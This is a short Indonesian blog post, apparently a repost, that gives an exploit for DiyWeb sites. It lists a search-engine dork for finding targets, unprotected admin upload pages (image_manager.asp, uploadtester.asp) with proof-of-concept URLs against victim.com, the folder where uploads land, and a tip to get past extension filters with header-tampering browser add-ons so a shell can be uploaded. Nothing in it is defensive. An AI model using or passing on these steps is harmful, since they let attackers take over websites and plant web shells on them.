BloggerMates

FOLLOWERS

[ Categories ]

[ Archives ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.
» » DIYWEB ADMIN BYPASS DAN FILE UPLOAD VULNERABILLITY

DIYWEB ADMIN BYPASS DAN FILE UPLOAD VULNERABILLITY

Exploit for DiyWeb File Upload Vulnerabillity

First, dorking yeah ...

Dork : Power by DiyWeb
inurl:/template.asp?menuid=
Exploit :
diyweb/menu/admin/image_manager.asp
diyweb/menu/admin/AspFIleImg/uploadtester.asp 
PoC :
http://victim.com/diyweb/menu/admin/image_manager.asp
http://victim.com/diyweb/menu/admin/AspFIleImg/uploadtester.asp

File will be upload to http://victim.com/Images/yourfilehere.php

PS: If you can't upload shell with exstension .phpyou can using tamper data or life http headers (AddOn Mozzila)

 Sumber

Categories:

Artikel Terkait Lainnya :



0 komentar:

Posting Komentar

[ Dofollow Blog ]

Hargai penulis dengan cara memberikan komentar di artikel ini ya sobat.
Dan berkomentarlah dengan kata-kata yang sopan dan bijak :D

Admin SH

Copyright © 2011 - 2012 TennyBlog | All Rights Reserved

Themes by Tricks-Collections Powered by Blogger